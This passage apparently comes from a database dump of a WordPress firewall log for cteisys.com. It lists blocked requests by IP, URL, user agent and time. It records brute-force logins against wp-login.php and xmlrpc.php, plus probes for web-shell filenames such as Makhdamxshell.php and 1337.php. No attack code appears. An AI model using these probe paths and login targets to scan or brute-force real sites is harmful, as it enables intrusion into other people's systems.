Safari\\/537.36\"}','fuIcwr6zxPFYZH7XjOhUsM1C',0,1665248956.7248,302,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','y8wtuUWbJ4lkdne0zN5QXqoM',0,1665248950.6032,414,'','GET',403,0,700,0,1,'',0),('36.94.142.166',610176678,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','3C60AviLxJzjaQq5u9UhyGHI',0,1665244313.8374,17971,'','POST',403,0,600,0,1,'',0),('208.109.54.127',3496818303,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','0fYldBGvZFpkxEA7iIq65NgS',0,1665242268.1445,17664,'','POST',403,0,600,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-admin/includes/class-wp-media-list-data.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lPZBKk9MxChfbIUao2HTtGDz',0,1665248946.8624,358,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/Makhdamxshell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OSFWeIHADTo70s3KZBvlJpuE',0,1665248931.5542,11711,'','GET',403,0,700,0,1,'',0),('171.244.0.91',2884894811,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','JGElOSTmDy0xjsHaZrbW6fvM',0,1665248373.8403,17688,'','POST',403,0,600,0,1,'',0),('107.167.244.51',1806169139,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','rF1csa4nuWVIjJGd0fvHBNlK',0,1665247554.8983,18732,'','POST',403,0,515,0,1,'',0),('134.19.179.243',2249438195,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vk92Aj3mfxgbTWhoCtKGU56R',0,1665247024.2897,18492,'','POST',403,0,515,0,1,'',0),('198.244.167.101',3337922405,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','RMZ5dPr0ieTFUSsphjOlf9Hv',0,1665246348.8394,17485,'','POST',403,0,600,0,1,'',0),('82.102.27.195',1382423491,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','lLNsPvX0k6c3RqJzA81oyIwG',0,1665245240.1863,18783,'','POST',403,0,515,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','v36WgMhCP94kN2ufsoULa7JF',0,1665249031.6184,317,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kKCsQim4T5N2Ju1WwagSDzeG',0,1665249027.8530,371,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rIb7tZKdhUG64cMJviYsFzkj',0,1665249023.7508,347,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PyxGvRh2QMjad40epcJ3Tl69',0,1665249019.3233,307,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/11index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','B92F6qA10v84jwgyl3ETCsXU',0,1665249014.8715,383,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UAiSOgEKVsWJ53PewlMQ6qmh',0,1665249013.1118,362,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/10.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','I4HTiZEJj1Wa2QCFw89Asgqk',0,1665249008.3246,349,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XD9noJ5LVbep8aq4MNRsdhQG',0,1665249006.6696,822,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MAvODWxQb1gijsRPznEFKhHf',0,1665249000.4425,303,'','GET',403,0,700,0,1,'',0),('171.244.0.91',2884894811,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','Rrf6noFdcPMlByZaTpsEGgN1',0,1665254404.3329,7936,'','POST',403,0,600,0,1,'',0),('128.127.104.80',2155833424,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8wZfmHe0B5NSsdutQDEliLjp',0,1665254132.2507,15314,'','POST',403,0,515,0,1,'',0),('209.141.36.190',3515688126,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','QRtKWLanPXAysFkqTp89zC6j',0,1665253670.7098,2275,'','POST',403,0,515,0,1,'',0),('54.38.73.235',908478955,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','HJeAzRb7saDiBhGClZVTE5x2',0,1665252415.4603,18554,'','POST',403,0,600,0,1,'',0),('194.233.89.214',3270072790,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dbyfG7t4ljEvK1r2RJx8mpSA',0,1665264838.2522,2473,'','POST',403,0,515,0,1,'',0),('142.93.201.0',2388510976,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','BmkAhsSyD8r3IZoQCiXY70UK',0,1665264161.9091,1815,'','POST',403,0,600,0,1,'',0),('8.218.143.243',148541427,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ig5czABR8YsWNr70jbPVqJ6Q',0,1665262378.7388,18236,'','POST',403,0,515,0,1,'',0),('173.236.152.148',2917963924,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','lSMnimd1xsIvWkGzufe7V3RA',0,1665262195.9541,1220,'','POST',403,0,600,0,1,'',0),('75.119.135.205',1266124749,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','Vn0QgCTRbX5Wp69HoBDechmJ',0,1665258308.2073,18445,'','POST',403,0,600,0,1,'',0),('64.90.36.102',1079649382,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','xEoOZuUvY0spNwDGB42K8b3l',0,1665256377.8587,18187,'','POST',403,0,600,0,1,'',0),('103.221.220.140',1742593164,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Fbaket7WvL6YJZgVBp9oGsd4',0,1665261941.7742,14170,'','POST',403,0,515,0,1,'',0),('125.227.127.195',2112061379,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AgPn1R6txu2ysSDIoVQ7HcaE',0,1665261921.6229,19803,'','POST',403,0,515,0,1,'',0),('167.99.78.164',2808303268,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ygtSvXCpj4wEH2hd70VuesZF',0,1665261500.3383,10014,'','POST',403,0,515,0,1,'',0),('87.107.144.155',1466667163,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JaZXciWOGDNmBQsHnSbdREPY',0,1665261105.1615,494,'','POST',403,0,515,0,1,'',0),('104.219.251.247',1759247351,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Z6FCNo0pmYjhDiK3uHdgt9kB',0,1665261505.7251,4595,'','POST',403,0,515,0,1,'',0),('72.34.62.119',1210203767,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yUIOnM60WZPl3SRJq5fsKoBh',0,1665261075.5591,2562,'','POST',403,0,515,0,1,'',0),('20.150.138.78',345410126,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','tjDQT65nCVw0vBp9KqSdlHNF',0,1665260901.1471,495,'','POST',403,0,515,0,1,'',0),('178.162.204.214',2997013718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zQ6S49wUn3NYgcTLM0VXiCr8',0,1665260851.5473,18198,'','POST',403,0,515,0,1,'',0),('49.12.209.135',822923655,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','cKl08CD3R2PTLx6gBuph14dw',0,1665260233.8793,17797,'','POST',403,0,600,0,1,'',0),('123.56.59.9',2067282697,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','B1nTp9YegLDmFVIUbk8HAuzR',0,1665263863.7491,580,'','POST',403,0,515,0,1,'',0),('111.90.150.36',1868207652,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ejGDkwE8lV3Si9mrAbRdWvxY',0,1665263822.1054,18527,'','POST',403,0,515,0,1,'',0),('184.168.125.241',3098050033,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VGbxzPHhE5IdAuji4cYB9Trg',0,1665263352.2238,513,'','POST',403,0,515,0,1,'',0),('216.158.230.167',3634292391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2rbjHv0uwVfKNBdAY54FioLc',0,1665263349.3676,2822,'','POST',403,0,515,0,1,'',0),('51.159.57.26',866072858,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bzHSfDLQ7a2tlYINwoPEjyuq',0,1665262851.8869,2693,'','POST',403,0,515,0,1,'',0),('87.107.144.155',1466667163,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ikFvZ8sbOjPGardxRSz0JhVf',0,1665262940.8913,1344,'','POST',403,0,515,0,1,'',0),('103.254.12.61',1744702525,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7bMZuEX4kjFVz9TKoHnJvAwr',0,1665267489.3941,17939,'','POST',403,0,515,0,1,'',0),('192.99.34.140',3227722380,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rlWhkdEARxepKc9QT5zH0uMa',0,1665267488.1923,19140,'','POST',403,0,515,0,1,'',0),('103.27.238.234',1729883882,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PLz4kRQciNnCpM9u07oa2Dbl',0,1665266964.3732,17650,'','POST',403,0,515,0,1,'',0),('15.235.168.187',267102395,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IuqbQCo8y9vXPGBscJz0RZ31',0,1665266976.3811,5634,'','POST',403,0,515,0,1,'',0),('109.233.192.83',1844035667,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PbqlHXW8hfMT6w09moBGukQz',0,1665266444.9984,532,'','POST',403,0,515,0,1,'',0),('194.163.132.194',3265496258,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JaK9SZyFgQWGUB3Erv4mi6jM',0,1665266420.7556,11117,'','POST',403,0,515,0,1,'',0),('124.158.12.149',2090732693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eqpMXW5FuQlY3RajE6Otizms',0,1665271977.3358,18260,'','POST',403,0,515,0,1,'',0),('190.171.170.94',3198921310,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QrGaZ0NVYBzksiMKt3OLpTuc',0,1665271419.8630,552,'','POST',403,0,515,0,1,'',0),('111.90.150.28',1868207644,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rcsIqAECOY0gvJkNn72Uoeh9',0,1665271399.1303,2246,'','POST',403,0,515,0,1,'',0),('157.0.140.186',2634058938,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oiBpmAC3ej4gwaHySnUETv2t',0,1665270829.3873,17339,'','POST',403,0,515,0,1,'',0),('103.154.177.165',1738191269,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZSG8nio5TDXpa6kvAYF09glB',0,1665270839.8963,6818,'','POST',403,0,515,0,1,'',0),('109.234.161.93',1844093277,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7XTtmhasFcN9A0OgRJGUyCSv',0,1665270290.0547,20498,'','POST',403,0,515,0,1,'',0),('188.166.236.35',3165056035,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','DjIWyEFAiC28J5Hvu3BocpsU',0,1665270088.1142,2326,'','POST',403,0,600,0,1,'',0),('62.90.101.113',1046111601,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WwIa1Qv3uSV7lELzrPD6iGTM',0,1665275568.1877,18121,'','POST',403,0,515,0,1,'',0),('35.194.233.240',599976432,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dkoqJUglSTmAvehZf6xEr9i4',0,1665274954.2232,4493,'','POST',403,0,515,0,1,'',0),('67.222.131.158',1138656158,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SbIBF5dNmjT1UEfDRZ0Y83Jz',0,1665274940.4949,18215,'','POST',403,0,515,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rKYexCXPTdGtOqkH3wlbWZ8n',0,1665274372.4435,2298,'','POST',403,0,515,0,1,'',0),('188.166.236.35',3165056035,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','dzLVE4smryWKloSQ7xDC2g1T',0,1665274073.8401,1433,'','POST',403,0,600,0,1,'',0),('185.252.31.179',3120308147,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','plP16mw3BjCcOV9edygt20WM',0,1665273791.4917,16681,'','POST',403,0,515,0,1,'',0),('103.145.51.200',1737569224,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1oKscuXJqa59hfB7nlkTDWSN',0,1665278086.7701,13748,'','POST',403,0,515,0,1,'',0),('208.113.171.103',3497110375,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','mthW9vcPB2TnC0iOSuEdLK74',0,1665278093.8641,5454,'','POST',403,0,600,0,1,'',0),('180.149.241.246',3029725686,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jZOxlFd96LtKo4c2W7aUmbBu',0,1665277431.2815,18392,'','POST',403,0,515,0,1,'',0),('103.90.232.106',1734010986,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7mqoBQUzROC6jXaGkPSKZ3py',0,1665277385.7813,1308,'','POST',403,0,515,0,1,'',0),('180.149.241.246',3029725686,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ohXBuZrM0lcDksfWUm8PFKEQ',0,1665281876.2402,19368,'','POST',403,0,515,0,1,'',0),('87.248.153.52',1475909940,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gZ7WKzAPYcQV5pFyUs6ulO8f',0,1665281232.8333,19635,'','POST',403,0,515,0,1,'',0),('185.252.31.59',3120308027,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JK8hZBWQqsd0UyjTw3MXRkIH',0,1665287714.4342,2516,'','POST',403,0,515,0,1,'',0),('20.109.101.102',342713702,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','32u0XjlH84av9SOzQJRKBkZ1',0,1665287034.0446,1853,'','POST',403,0,515,0,1,'',0),('162.241.120.248',2733734136,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ImSjqN4RLnxs1VzMPCrl5UaX',0,1665286998.8403,18677,'','POST',403,0,515,0,1,'',0),('103.35.64.73',1730363465,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vRYoyxMKfCcuhpLUEDjOW4G5',0,1665286332.9027,2389,'','POST',403,0,515,0,1,'',0),('208.109.39.235',3496814571,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UXsOxnfd68TEbJ9gGFKqzwSp',0,1665285677.4383,18932,'','POST',403,0,515,0,1,'',0),('216.245.215.122',3639990138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EBFHblIPc8uptG59dTSLQYvw',0,1665285055.3443,638,'','POST',403,0,515,0,1,'',0),('67.205.143.236',1137545196,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pWTOBVke4gDwjHumAtdrzyqF',0,1665285047.0373,2492,'','POST',403,0,515,0,1,'',0),('67.205.143.236',1137545196,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7EOaCQsqD6KN8SGuJjPWbYfx',0,1665290964.8003,18591,'','POST',403,0,515,0,1,'',0),('194.44.53.72',3257677128,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3woYEsH8VK2rjFTxudW4qRJe',0,1665290287.6492,2310,'','POST',403,0,515,0,1,'',0),('39.107.137.177',661359025,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3SljrcImLVRKnZfBsFqN741U',0,1665290359.9077,1212,'','POST',403,0,515,0,1,'',0),('138.68.140.0',2319748096,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','Azonc0LB2Xqs7HSmEkFC5Vya',0,1665290219.0483,17506,'','POST',403,0,600,0,1,'',0),('47.106.201.134',795527558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HphweJOdQqkfM18Biny25jLY',0,1665289655.3128,507,'','POST',403,0,515,0,1,'',0),('3.34.104.242',52586738,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4k0YSBd1puWPtQ9jXzGvnRrK',0,1665289636.6133,9892,'','POST',403,0,515,0,1,'',0),('107.189.6.184',1807550136,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','dPz9msZyvj5pGVlEH4krBM7K',0,1665289367.5932,1199,'','POST',403,0,515,0,1,'',0),('111.90.150.28',1868207644,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','A4HJQeTLgKWVbo0wuX9GOz3i',0,1665288971.8123,15426,'','POST',403,0,515,0,1,'',0),('209.145.54.196',3515954884,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tMAFm4UcVGZ7bSzHrWxfJeEv',0,1665288347.9743,1187,'','POST',403,0,515,0,1,'',0),('171.244.16.103',2884898919,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xPJDU2ftXZen0MhcB1GSvYCq',0,1665288305.0521,7622,'','POST',403,0,515,0,1,'',0),('77.39.212.31',1294455839,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','ZdrWbzTOFxLDGp3cgljSPwUu',0,1665288183.9101,1375,'','POST',403,0,600,0,1,'',0),('87.248.153.52',1475909940,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rLjb6EyT31mseYv0NW4tDhop',0,1665294952.9279,19370,'','POST',403,0,515,0,1,'',0),('54.37.74.123',908413563,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 